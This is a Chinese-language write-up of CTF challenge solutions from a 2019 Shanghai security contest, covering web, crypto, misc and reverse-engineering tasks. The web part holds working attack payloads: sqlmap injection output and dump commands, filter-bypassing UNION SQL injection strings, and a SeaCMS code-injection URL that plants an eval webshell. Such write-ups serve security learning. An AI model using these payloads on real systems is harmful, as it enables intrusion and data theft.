2019「嘉韋思杯」上海市網絡安全邀請賽WriteUp
- 2019 年 10 月 8 日
- 筆記
Web1 土肥原賢二 100pt
嘗試提交 gid=1'報錯, gid=1or1=1回顯正常,直接使用 sqlmap進行測試,存在以下注入方式:
Parameter: gid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: gid=-4255' OR 8149=8149# Vector: OR [INFERENCE]# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: gid=3' OR (SELECT 3949 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(3949=3949,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ilbj Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: gid=3' OR SLEEP(5)-- XAjo Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: gid=3' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a717671,0x4845486a6d6e79654d7a704461694b426771414872527a57624a724e78735943417a686b53664d6b,0x7178787a71)# Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY]#
Payload: sqlmap-u"http://47.103.43.235:81/quest/web/a/index.php?gid=1"-p gid-v3-D luozhen-T flag-C"id,flag"--dump.
Web2 戴星炳 200pt
2s快速提交正確結果即可獲取flag,Python腳本:
import re import requests url = 'http://47.103.43.235:82/web/a/index.php' r = requests.session() text = r.get(url).text calc = str(re.findall("</p><p>(.*?)</p>", text))[2:-2] ans = eval(calc) data = {'result':ans} res = r.post(url, data) print(res.text)
運行結果:flag{Y0U4R33o_F4ST!}。
WriteUp記錄到這裡的時候主辦方再次關閉了比賽官網,只開放題目鏈接,下面就各題目進行記錄~
Web3 MD5碰撞
題目鏈接:http://47.103.43.235:85/a/
F12查看網頁源代碼發現以下注釋PHP代碼:
if ((string)$_POST['param1']!==(string)$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))
兩次比較( !==/ ===)均採用了比較嚴格的比較,無法通過弱類型的比較去繞過。
可以通過MD5碰撞生成器fastcoll_v1.0.0.5.exe.zip 來構造兩個MD5值相同,但內容不同的字符串來繞過。
這裡參考MD5碰撞-奶奶奶奶奶糖的樣本提交進行測試~
Payload:
param1= %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP ¶m2= %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP
得到flag{MD5@_@success}。
Web4 SeaCMS
題目地址:http://47.103.43.235:84/
後台地址:http://47.103.43.235:84/admin/login.php
嘗試弱口令登錄後台,回顯 admin用戶不存在。
參考Seacms漏洞分析利用復現 By Assassin Search.php漏洞利用姿勢,寫入一句話木馬,用Cknife連接之。
Payload:
http://47.103.43.235:84/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
在根目錄下發現flag.txt,獲取flag{!!seacms_@@}。
Web5 Break the sha
題目地址:http://47.103.43.235:82/web/b/index.php
F12查看源代碼發現 <!--index.phps-->,訪問下載index.phps文件打開獲取:
<?php error_reporting(0); $flag = '********'; if (isset($_POST['name']) and isset($_POST['password'])){ if ($_POST['name'] == $_POST['password']) print 'name and password must be diffirent'; else if (sha1($_POST['name']) === sha1($_POST['password'])) die($flag); else print 'invalid password'; } ?>
name與password字段用 ==弱類型進行比較,sha1用 ===進行強類型比較,可以用數組繞過。
Payload:
name[]=1&password[]=2
回顯:flag{Y0ujustbr0ke_sha1}。
Web6 SQLi2
題目地址:http://47.103.43.235:83/web/a/index.php?id===QM
觀察到 id===MQ,QM==是1的Base64編碼,推測為Base64編碼後逆序傳值。
手工注入測試發現過濾了 and、 or、 select、 union關鍵字,去除了單引號、雙引號、等號、空格等字符,可以雙寫繞過關鍵字的過濾,採用 /**/繞過空格,使用字符竄的hex編碼繞過引號以及使用 regexp繞過等號。
- 爆數據庫
-1/**/uniunionon/**/selselectect/**/1,group_concat(schema_name),3,4,5,6/**/from/**/infoorrmation_schema.schemata--
- 爆ctf_sql中的表
-1/**/uniunionon/**/selselectect/**/1,group_concat(table_name),3,4,5,6/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/regexp/**/0x6374665f73716c--
- 爆flag中的列
-1/**/uniunionon/**/selselectect/**/1,group_concat(column_name),3,4,5,6/**/from/**/infoorrmation_schema.columns/**/where/**/table_name/**/regexp/**/0x666c6167--
- 獲取flag
-1/**/uniunionon/**/selselectect/**/1,group_concat(flag),3,4,5,6/**/from/**/flag--
Crypto1 神秘代碼
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0xVmpKS1NHVkVRbUZXVmxsM1ZqQmFTMlJIVmtkWGJGcHBWa1phZVZadGVGWmxSbGw1Vkd0c2FsSnRhRzlVVm1oRFZWWmFkR05GZEZSTlZXdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbXRXTVhCRlZXeHdWMDFFUlRCV2Fra3hVakZhV0ZOcmFGWmlhMHBYV1d4b1UwMHhWWGhYYlhSWFRWWndNRlZ0ZUZOVWJVWTJVbFJDVjJFeVRYaFdSRVpyVTBaT2NscEhjRk5XUjNob1YxZDRiMVV4VWtkWGJrNVlZbGhTV0ZSV1pEQk9iR3hXVjJ4T1ZXSkdjRlpXYlhoelZqRmFObEZZYUZkU1JYQklWbXBHVDFkV2NFZGhSMnhUWVROQ1dsWXhXbXROUjFGNVZXNU9hbEp0VWxsWmJGWmhZMnhXY1ZKdFJsUlNiR3cxVkZaU1UxWnJNWEpqUm1oV1RXNVNNMVpxU2t0V1ZrcFpXa1p3VjFKWVFrbFdiWEJIVkRGa1YyTkZaR2hTTW5oVVdWUk9RMWRzV1hoWGJYUk9VbTE0V0ZaWGRHdFdNV1JJWVVac1dtSkhhRlJXTUZwVFZqRndSMVJ0ZUdsU2JYY3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5TUmxweFUydGFiRlpzU2xwWlZWcHJZVWRGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU2MxWnRkRmRpVlhCNVdUQmFjMWR0U2tkWGJXaGFUVlp3ZWxreU1VZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpyWWtad2VGVnRkREJWTWtwSVZXcENXbFpXY0hKWlZXUkdaVWRPU0U5V2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTVc5bGJHUllaVWM1YVUxWFVucFdNV2h2VjBkS1dWVnJPVlppVkVVd1ZqQmFZVmRIVWtoa1JtUnBWbGhDU2xkV1ZtOVVNVnAwVW01S1QxWnNTbGhVVlZwM1ZrWmFjVkp0ZEd0V2JrSkhWR3hhVDJGV1NuUlBWRTVYVFc1b1dGbFVRWGhUUmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUjNSb1lsVndWMWx1Y0V0V2JGbDZZVVJPV21FeVVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVjFsc2FFTldSbXhaWTBaa2EwMVdjREJaTUZZd1lWVXhXRlZyYUZkTmFsWlVWa2Q0UzFKc1pIVlRiRlpYWWtoQ05sWkhlR0ZaVm1SR1RsWmFVRlp0YUZSWmJGcExVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYlVaVlZteHdNMVpyV21GalZrcDFXa1pPVGxacmIzZFhiRlpyWXpGVmVWTnNiRnBOTW1oWVZGWmFTMVZHY0VWU2EzQnNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdibEpzVTBkU2NGVnFRbmRXTVZsNVpFaGtWMDFFUmpGWlZWSlBWMjFGZVZWclpHRldNMmhJV1RKemVGWXhjRWRhUlRWT1VsaENTMVp0TVRCVk1VMTRWVzVTVjJFeVVtaFZNRnBoVmpGc2MxcEVVbGRTYlhoYVdUQmFhMWRHV25OalJteGFUVVpWTVZsV1ZYaFhSbFp6WVVaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlXV3RvUTFkV1draGtSMFpvVFdzMWVsWXlOVk5oTVVsNVlVWm9XbFpGTlVSVk1WcHJWbFpHZEZKc1drNVdNVWwzVmxkNGIySXhXWGhhUldob1VtMW9WbFpzV25kTk1XeFdWMjVrVTJKSVFraFdSM2hUVlRKRmVsRllaRmhpUmxweVdYcEdWbVZXVG5KYVIyaE9UVzFvV1ZaR1l6RlZNV1JIVjJ4V1UyRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQktWVmMxYjFZeFdqWlNWRUpoVWtWYWNsVnFTa3RUVmxKMFlVWk9hR1ZzV2pSV2JUQjRaV3N4V0ZadVRsaGlSMmh4V2xkNFlWWXhVbGRYYlVaWFZteHdlbGxWYUd0V2F6RldWbXBTVjJKWVFtaFdiVEZHWkRGYWRWUnNWbGRTVlhCVVYxZDBWbVF5VVhoV2JGSlhWMGhDVkZWV1RsWmxiRXBFVmxod1UxRlRWWHBTUTFWNlVrRWxNMFFsTTBRJTNE
在Base64解密不斷進行B64解密得到:
fB__l621a4h4g_ai{&i}
共20個字符,嘗試進行4*5分列得到:
fB__ l621 a4h4 g_ai {&i}
得到flag{B64&2hai_14i}.
Crypto2 神秘代碼2
腦洞題目~嘗試進行移位變換最終檢索到flag{c4es4r_variation},為凱撒移位的變種。
C++ Payload:
string s = "bg[`sZ*Zg'dPfP`VM_SXVd"; for(int diff = 0; diff <= 10; diff++) { //diff為4時得到flag{c4es4r_variation} for(int i = 0; i < s.length(); i++) { cout << char(s[i] + diff + i); } cout << endl; }
Crypto3 希爾密碼
給出加密矩陣和密文求明文,這裡可以參考希爾密碼解密過程求出3*3解密矩陣:
[[8,16,27],[8,99 ,24],[27,24,27]],這裡乘上3*4密文矩陣 [[23,10,12,24],[16,2,25,3,],[9,0,9,5]]得到矩陣:
對26進行取余後轉化為字符打印得到 hillisflagxx,C++腳本:
#include <iostream> using namespace std; int a[12] = {683,112,739,375,1984,278,2787,609,1248,318,1167,855}; int main() { for(int i = 0; i < 12; i++) { cout << (char)('a' + a[i] % 26); } return 0; }
Crypto4 RSA256
題目地址:http://47.103.43.235:85/C/RSA256.tar.gz
下載解壓後得到公鑰gy.key和fllllllag.txt。
- 解法1
通過openssl查看公鑰信息:
$ openssl rsa -pubin -in gy.key -text -modulus Public-Key: (256 bit) Modulus: 00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd: c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0: 89:12:d9 Exponent: 65537 (0x10001) Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9 writing RSA key -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni 0bXTcqTQiRLZAgMBAAE= -----END PUBLIC KEY-----
獲取模數(Modulus) N=76775333340223961139427050707840417811156978085146970312315886671546666259161(0xA9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9),以及公鑰指數(Exponent)e=65537 (0x10001)。
模數N在http://factordb.com可在線分解為:
p = 273821108020968288372911424519201044333 q = 280385007186315115828483000867559983517
已知n(可分解為p,q),e,c,可以計算出d後解密,Python腳本:
import gmpy2 import rsa p = 273821108020968288372911424519201044333 q = 280385007186315115828483000867559983517 n = 76775333340223961139427050707840417811156978085146970312315886671546666259161 e = 65537 d = int(gmpy2.invert(e , (p-1)*(q-1))) privatekey = rsa.PrivateKey(n , e , d , p , q) with open("fllllllag.txt" , "rb") as f: print(rsa.decrypt(f.read(), privatekey).decode())
得到flag{2o!9CTFECUN}。
- 解法2
已知公鑰gy.key和cipher message fllllllag.txt求解明文,這裡嘗試用RSACtfTool(項目地址:https://github.com/Ganapati/RsaCtfTool)直接進行解密:
D:ToolsCryptoRSACtfToolRsaCtfTool $ python2 RsaCtfTool.py --publickey gy.key --uncipherfile fllllllag.txt [+] Clear text : b'x00x02cx8bLxc2ux86xc6xbex00flag{_2o!9_CTF_ECUN_}'
獲取flag{2o!9CTFECUN}。
Misc1 奇怪的單點音
題目地址:http://47.103.43.235:85/d/奇怪的單點音.wav
播放音頻有明顯的雜音和3次嘟聲,嘗試用 Aduacity打開分析,觀察頻譜圖發現flag字段:
Hint:主辦方聲明flag{85a9d4517d4725b98cbc9fd_554216}並非最終答案,請認真審題。
接下來就是腦洞部分,觀察到字符串(含下劃線)共32位,疑似MD5加密,嘗試替換下劃線為摩斯密碼的t、以及字符串中未出現的數字,當下劃線全替換為 0時在ChaMd5.org成功解密。
獲取flag{hsd132456}.
Misc2 二維碼
下載圖片嘗試使用 binwalk進行探測:
$ python binwalk index.png DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced 41 0x29 Zlib compressed data, compressed 5708 0x164C Zip archive data, encrypted at least v1.0 to extract, compressed size: 64, uncompressed size: 52, name: key.txt
發現存在壓縮包文件,得到Hint:解壓密碼為管理人員的QQ號,使用binwalk -e 分離後使用ARCHPR進行爆破。
獲取密碼 674290437,解壓得到flag{d6@YX$_m^aa0}。
Misc3 jsfuck
題目地址: http://47.103.43.235:85/b/%E7%AC%AC%E4%B8%80%E9%A2%98_js%EF%BC%9F.txt
Base64解碼後得到 jsfuck加密的js腳本,直接複製在控制台Console運行即可獲取flag{sdf465454dfgert32}。
RE1 梅津美治郎
查殼無殼,為32位PE文件,在IDA中查看:
Level1基本沒什麼難度,進入Level2:
這裡有個反調試函數,使用x86dbug調試會直接退出。但是使用OD或者吾愛破解版本的OD可以解決這個反調試函數。往後動態調試進到
其操作就是將
里的數據與0x2異或,然後與輸入對比,相同即可。
a = [0x75,0x31,0x6e,0x6e,0x66,0x32,0x6c,0x67] for i in a: print (chr(i ^ 0x2),end = '')
得到 w3lld0ne。
使用下劃線連接,得到flag{r0b0RUlez!_w3lld0ne}.
RE2 76號
查看無殼為32位ELF文件。這個純靜態觀察即可,查看字符串,這裡有correct:
交叉引用,可以進入到main函數,這裡閱讀main函數,可以看到printf後再跟getline獲取輸入,再跟到後面一個check函數 0x804848f,然後根據返回結果判斷是否正確。接下來進入到該check函數:
反編譯check函數,是一個switch。函數的兩個參數一個是我們輸入的字符串地址,一個是0。尋找問題的關鍵點在於返回1.
注意每一個return,將可能返回1的return作為重點查看。例如:
在while循環的開頭,每次會填充堆棧里的一個值為1,該值與我們輸入有關。以v5[0]為起點。然後仔細閱讀C代碼,嘗試:
發現符合程序流程。後續繼續猜測令V2等於2的case,以此類推。4和8的比較特殊,後面都是手動驗證,發現正確符合規律,獲取flag{09vdf7wefijbk}~
Crypto&Misc&RE題目下載鏈接: https://pan.baidu.com/s/10tlJmUVZtekuYNgTi9eCNQ 提取碼: bkiv
